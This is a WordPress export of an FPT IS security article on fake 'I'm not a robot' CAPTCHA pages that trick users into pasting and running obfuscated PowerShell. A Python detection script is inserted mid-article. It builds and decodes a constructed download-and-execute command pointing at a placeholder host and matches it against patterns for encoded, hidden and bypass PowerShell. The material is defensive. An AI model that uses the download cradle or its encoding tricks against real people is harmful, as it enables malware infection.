{"id":22152,"date":"2025-08-05T09:06:59","date_gmt":"2025-08-05T02:06:59","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=22152"},"modified":"2026-01-20T10:23:37","modified_gmt":"2026-01-20T03:23:37","slug":"cybercriminals-exploit-im-not-a-robot-captchas","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/cybercriminals-exploit-im-not-a-robot-captchas\/","title":{"rendered":"Cybercriminals Exploit &#8220;I&#8217;m Not a Robot&#8221; Captchas for Malware"},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p>A new sophisticated malware attack exploits users through fake browser verification windows designed to resemble legitimate CAPTCHA systems.<\/p>\n<h1 id=\"heading-how-it-works\" class=\"permalink-heading\"><strong>How it Works<\/strong><\/h1>\n<p>The attack begins when users encounter a seemingly authentic browser security check page, featuring the familiar &#8220;I\u2019m not a Robot&#8221; interface similar to Google\u2019s reCAPTCHA system.<\/p>\n<p>However, instead of clicking on squares or selecting images as usual, this fake verification interface instructs users to perform a series of keyboard shortcuts to &#8220;complete the browser check.&#8221;<\/p>\n<p>The malicious interface presents three seemingly harmless steps:<\/p>\n<ol>\n<li>Press Windows + R to open the Run dialog box,<\/li>\n<li>Press Ctrl + V to paste content from the clipboard,<\/li>\n<li>Press Enter to execute the command.<\/li>\n<\/ol>\n<\/div>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/unnamed-1751595869.png\"><img decoding=\"async\" class=\"size-full wp-image-22154 aligncenter\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/unnamed-1751595869.png\" alt=\"Unnamed 1751595869\" width=\"430\" height=\"472\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 1. 
Process of performing malicious behavior<\/em><\/p>\n<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p>Attackers have meticulously designed the interface to look authentic, using visual elements and language similar to legitimate security checks.<\/p>\n<h1 id=\"heading-technical-analysis\" class=\"permalink-heading\"><strong>Technical Analysis<\/strong><\/h1>\n<p>Technical analysis reveals that the core of the attack lies in clipboard manipulation combined with PowerShell obfuscation.<\/p>\n<p>When the user clicks the fake checkbox, JavaScript on the page copies an obfuscated PowerShell command string into the clipboard. The user never sees that text: the click supplies the user gesture that browsers require before a page may write to the clipboard, so no permission prompt appears, and the instructions that follow (Windows + R, Ctrl + V, Enter) make the user paste and execute the command themselves.<\/p>\n<p>The PowerShell payload employs multiple layers of obfuscation, including base64 encoding (typically passed through the -EncodedCommand switch, which expects UTF-16LE text, so the plain command never appears in process-creation logs), string concatenation, and variable substitution, to evade static analysis tools and signature-based AV detection.<\/p>\n<p>The obfuscated PowerShell command typically contains instructions to download and execute additional malicious payloads from a remote server.
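<\/p>
<p>The decoding and triage that the monitoring recommendation later in this article calls for can be made concrete. The following Python script is an added example, not code from the article or from FPT: it first builds a constructed ClickFix-style command line (the host example.invalid is a reserved name that never resolves) the same way the attackers do, then decodes the -EncodedCommand base64 (UTF-16LE), folds the string-concatenation and variable-substitution layers, and flags the indicators a detection rule would key on, including the explorer.exe parent that the Run dialog produces. The sample process-creation events and their field names are constructed for the demo and are assumptions, not real telemetry.<\/p>
```python
import base64
import re
from dataclasses import dataclass, field

# Constructed sample, not taken from the article: the kind of one-liner a fake
# CAPTCHA page places on the clipboard. example.invalid is a reserved name and
# never resolves. The '+' joins and the $p/$u variables are the concatenation and
# variable-substitution layers; base64 over UTF-16LE is what -EncodedCommand expects.
CLIPBOARD_SCRIPT = (
    "$u = 'http://' + 'example.invalid' + '/a.txt'; "
    "$p = 'iwr'; "
    "iex ((& $p $u -UseBasicParsing).Content)"
)


def build_encoded_cmdline(script):
    """Encode a script the way ClickFix payloads do (UTF-16LE, base64, -enc)."""
    b64 = base64.b64encode(script.encode('utf-16le')).decode('ascii')
    return 'powershell.exe -w hidden -nop -ep bypass -enc ' + b64


# Constructed process-creation events; field names are assumptions modelled on
# Sysmon Event ID 1 / Security 4688 data, not real telemetry.
SAMPLE_EVENTS = [
    # ClickFix: the Run dialog is hosted by explorer.exe, so the pasted command
    # appears as a PowerShell child of explorer.exe.
    {'pid': 4120, 'parent_image': 'explorer.exe', 'image': 'powershell.exe',
     'cmdline': build_encoded_cmdline(CLIPBOARD_SCRIPT)},
    # Benign: an editor running a build script.
    {'pid': 5133, 'parent_image': 'code.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe -NoProfile -File build.ps1'},
    # Encoded but harmless admin one-liner launched from a console.
    {'pid': 6010, 'parent_image': 'cmd.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe -enc '
                + base64.b64encode('Get-Service'.encode('utf-16le')).decode('ascii')},
]

# Switches matched on the raw command line (need whitespace, so base64 cannot match).
SWITCH_INDICATORS = {
    'encoded_command': re.compile(r'-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}', re.I),
    'hidden_window': re.compile(r'-w(?:indowstyle)?\s+hidden', re.I),
    'policy_bypass': re.compile(r'-e(?:x|xecutionpolicy|p)\s+bypass', re.I),
}
# Behaviour matched on the decoded script (or the raw command line if none).
CONTENT_INDICATORS = {
    'download_cradle': re.compile(
        r'\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b', re.I),
    'in_memory_exec': re.compile(r'\b(?:iex|invoke-expression)\b', re.I),
}
ENCODED_ARG = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})', re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*(?:;|$)")
URL = re.compile(r"https?://[^\s'()<>]+")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16le')
    except (ValueError, UnicodeDecodeError):
        return None


def fold_concat(script):
    """Fold 'a' + 'b' into 'ab' until nothing changes (each fold can expose another)."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def deobfuscate(script):
    """Undo simple concatenation and $var = 'literal' substitution layers."""
    script = fold_concat(script)
    assignments = dict(ASSIGN.findall(script))
    script = ASSIGN.sub('', script)
    for name, value in assignments.items():
        script = re.sub(r'\$' + re.escape(name) + r'\b',
                        lambda _m, v=value: "'" + v + "'", script)
    return fold_concat(script).strip()


@dataclass
class Finding:
    pid: int
    flags: list = field(default_factory=list)
    decoded_script: str = ''
    urls: list = field(default_factory=list)

    @property
    def verdict(self):
        # explorer.exe parent plus two or more other indicators is the Win+R /
        # Ctrl+V / Enter pattern; anything else flagged gets a human look.
        if 'run_dialog_parent' in self.flags and len(self.flags) >= 3:
            return 'clickfix_suspect'
        return 'review' if self.flags else 'benign'


def triage(event):
    """Score one process-creation event for the fake-CAPTCHA pattern."""
    f = Finding(pid=event['pid'])
    cmdline = event['cmdline']
    if (event['parent_image'].lower() == 'explorer.exe'
            and event['image'].lower() == 'powershell.exe'):
        f.flags.append('run_dialog_parent')
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        f.decoded_script = deobfuscate(decoded)
    f.flags += [n for n, rx in SWITCH_INDICATORS.items() if rx.search(cmdline)]
    content = f.decoded_script or cmdline
    f.flags += [n for n, rx in CONTENT_INDICATORS.items() if rx.search(content)]
    f.urls = URL.findall(content)
    return f


if __name__ == '__main__':
    for ev in SAMPLE_EVENTS:
        found = triage(ev)
        print(ev['pid'], found.verdict, found.flags, found.urls)
        if found.decoded_script:
            print('  decoded:', found.decoded_script)
```
<p>Run as a script it prints a verdict for each sample event; in practice the input would be Sysmon Event ID 1 or Security Event ID 4688 records carrying the parent image and command line. The deobfuscator handles only single-quoted literals and plain assignments; real payloads add further layers (format operators, character arithmetic, compression), so treat it as a triage aid and rely on PowerShell script block logging (Event ID 4104) for the fully decoded script.<\/p>
<p>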
Notably, security analysts have observed many fileless variants: the downloaded script is handed straight to Invoke-Expression and runs only in memory (RAM) without a file ever being written to disk, so file-based scanning never sees it and detection becomes even more challenging.<\/p>\n<p>Additionally, the PowerShell execution uses legitimate Windows processes and services, making the malware appear as normal system activity while maintaining persistence through registry modifications or scheduled tasks.<\/p>\n<h1 id=\"heading-recommendations\" class=\"permalink-heading\"><strong>Recommendations<\/strong><\/h1>\n<p><strong>FPT Threat Intelligence<\/strong>\u00a0recommends several measures for organizations and individuals to prevent this dangerous attack campaign:<\/p>\n<ul>\n<li><strong>Configure Browser Security:<\/strong>\u00a0Restrict clipboard access for untrusted sites where the browser offers that control. Note that writing to the clipboard only requires a user gesture such as a click, which the fake checkbox supplies, so browser settings alone cannot reliably stop the copy; the endpoint controls below are what actually break the chain.<\/li>\n<li><strong>Enhance Security Awareness Training:<\/strong>\u00a0Educate users on distinguishing between real and fake CAPTCHAs; emphasize that legitimate browser verification systems never require pasting and executing commands via the Run dialog, Command Prompt, or PowerShell.<\/li>\n<li><strong>Monitor PowerShell Execution Behavior:<\/strong>\u00a0Implement Endpoint Detection and Response (EDR) solutions to detect abnormal PowerShell command patterns, especially those related to network connections or system configuration changes. Enable PowerShell script block logging (Event ID 4104) so that encoded and obfuscated commands are recorded in decoded form, and alert on powershell.exe launched by explorer.exe with a hidden window or an encoded command, which is the signature of the Run dialog sequence. During incident response, the RunMRU key under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer preserves what was pasted into the Run dialog.<\/li>\n<li><strong>Strengthen Network Security:<\/strong>\u00a0Configure security devices to identify typical attack traffic patterns such as malware downloads and Command-and-Control (C2) communications.<\/li>\n<li><strong>Reduce Attack Surface with System Policies:<\/strong>\u00a0Deploy application control (AppLocker or Windows Defender Application Control) to block PowerShell for standard users or run it in Constrained Language Mode, and consider removing the Run dialog for users who do not need it via the &#8220;Remove Run menu from Start Menu&#8221; policy, which also disables the Windows + R shortcut. Do not rely on the PowerShell execution policy: it is not a security boundary, the pasted command line sets -ExecutionPolicy Bypass itself, and an inline command passed with -Command or -EncodedCommand is not subject to it at all.<\/li>\n<\/ul>\n<h1 id=\"heading-references\" class=\"permalink-heading\"><strong>References<\/strong><\/h1>\n<ul>\n<li><a
href=\"https:\/\/cybersecuritynews.com\/malware-attack-im-not-a-robot-check\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>New Malware Attack Via \u201cI\u2019m not a Robot Check\u201d to Trick Users into Running Malware<\/strong><\/a><\/li>\n<\/ul>\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/p>\n<p><em>Tran Hoang Phong \u2013 FPT IS Cyber Security Center<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div class=\"-mt-5 mb-10\"><\/div>\n","protected":false},"author":21,"featured_media":22148,"parent":0,"template":"","nang_luc":[790,821],"danh_muc_goc_nhin_so":[789],"dich_vu":[858,712],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-22152","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry","nang_luc-experts-sharing","nang_luc-security","danh_muc_goc_nhin_so-expert-sharing","dich_vu-private-sector-news","dich_vu-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/22152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/22148"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=22152"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=22152"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=22152"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=22152"},{"tax
onomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=22152"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=22152"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=22152"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=22152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}